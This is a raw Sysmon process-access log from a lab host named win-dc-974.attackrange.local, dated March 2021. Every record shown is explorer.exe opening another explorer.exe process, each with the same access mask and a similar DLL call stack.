16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236022Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236021Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236020Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236019Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236018Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236017Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236016Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236015Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236014Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236013Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236012Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236011Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236010Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236009Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236008Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236007Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236006Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236005Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236004Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236003Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236002Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236001Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236000Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235999Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235998Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235997Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235996Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235995Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 